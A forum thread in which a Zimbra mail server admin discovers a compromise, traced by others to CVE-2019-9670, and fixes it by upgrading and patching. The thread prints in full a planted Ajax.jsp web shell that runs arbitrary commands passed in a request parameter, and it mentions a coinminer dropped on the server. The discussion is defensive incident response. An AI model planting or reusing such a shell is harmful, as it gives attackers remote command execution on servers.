Page 1 of 1

zimbra not listen in 443 port

Posted: Sat Apr 13, 2019 8:59 am
by seryoga_p
Hi, some strange things are going on my mail server

Code: Select all

[zimbra@mail ~]$ zmcontrol -v
Release 8.7.1_GA_1670.RHEL7_64_20161025045328 RHEL7_64 FOSS edition.
[zimbra@mail ~]$


Today suddenly stopped working zimbra on 443 port with error

Code: Select all

HTTP ERROR 404
Problem accessing /public/error.jsp. Reason:

    /public/error.jsp


nginx is fine:

Code: Select all

[zimbra@mail ~]$ lsof -i :443
COMMAND  PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nginx   2452 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2453 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2454 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2455 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
[zimbra@mail ~]$

accidentally i looked for a folder /opt/zimbra/jetty/webapps/zimbra/public/

Code: Select all

[root@mail log]# ls -l /opt/zimbra/jetty/webapps/zimbra/public/
total 52
-rw-rw-r-- 1 zimbra zimbra 1522 Jan 31 10:44 404.html
-rw-rw-r-- 1 zimbra zimbra 1534 Oct 25  2016 5xx.html
-rw-r----- 1 zimbra zimbra  332 Apr 12 21:08 Ajax.jsp
-rw-rw-r-- 1 zimbra zimbra 2789 Oct 25  2016 blankHistory.html
-rw-rw-r-- 1 zimbra zimbra 1389 Oct 25  2016 blank.html
-rw-rw-r-- 1 zimbra zimbra 2131 Oct 25  2016 empty.html
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 flash
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 jsp
-rw-rw-r-- 1 zimbra zimbra 2293 Oct 25  2016 launch.html
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 proto
drwxrwxr-x 3 zimbra zimbra 4096 Dec 10  2016 sounds
-rw-rw-r-- 1 zimbra zimbra   33 Jan 31 10:39 test.txt
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 tmp

there is a file Ajax.jsp modified yesterday

Code: Select all

[root@mail public]# cat Ajax.jsp
<%if("LVwpVsmayetL6cvL2YTonwYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>


am i hacked?? Is there any way to restore zimbra functionality?

Re: zimbra not listen in 443 port

Posted: Sat Apr 13, 2019 9:09 am
by phoenix
seryoga_p wrote:am i hacked?? Is there any way to restore zimbra functionality?
If you want to check then see if this applies to your server: https://forums.zimbra.org/viewtopic.php?f=15&t=65932

Re: zimbra not listen in 443 port

Posted: Sat Apr 13, 2019 10:16 am
by seryoga_p
fixed
1. upgrade to 8.7.11
2. Patch P10
now everything is working

Re: zimbra not listen in 443 port

Posted: Thu Apr 18, 2019 7:03 pm
by GlooM
seryoga_p wrote:fixed
1. upgrade to 8.7.11
2. Patch P10
now everything is working


Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file : /opt/zimbra/log/zmswatch?

Re: zimbra not listen in 443 port

Posted: Fri Apr 19, 2019 11:35 am
by seryoga_p
GlooM wrote:Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file : /opt/zimbra/log/zmswatch?

Hi, GlooM )
Yes, there is a files zmswatch and zmswatch.out
virustotal says its a bitcoin miner

Re: zimbra not listen in 443 port

Posted: Fri Apr 19, 2019 1:25 pm
by GlooM
seryoga_p wrote:Yes, there is a files zmswatch and zmswatch.out
virustotal says its a bitcoin miner


As I understand it, the hacking technique is the same.
zmswatch - miner, Ajax.jsp - shell?

Last patch is required to solve the problem. But this is not the same as described here: https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ - There are no files zmcat; l.sh and s.sh, and less trash in /opt/zimbra/jetty/

This is probably a new hacking technique than previously described in CVE-2019-9670

Re: zimbra not listen in 443 port

Posted: Fri Apr 19, 2019 1:47 pm
by seryoga_p
Scanned with clamav:
[root@mail log]# sudo clamscan -i -r /opt/zimbra/log
/opt/zimbra/log/zmswatch: Multios.Coinminer.Miner-6781728-2 FOUND


It would probably be more correct to make backups of zimbra, reinstall the centos and make a fresh zimbra install then restore backup, but unfortunately, there is no storage space on the rented vps to recover mail quickly (now ~ 80GB).
I plan to stay on this vps to the end of the year and then move to physical hardware with zimbra or somesing else.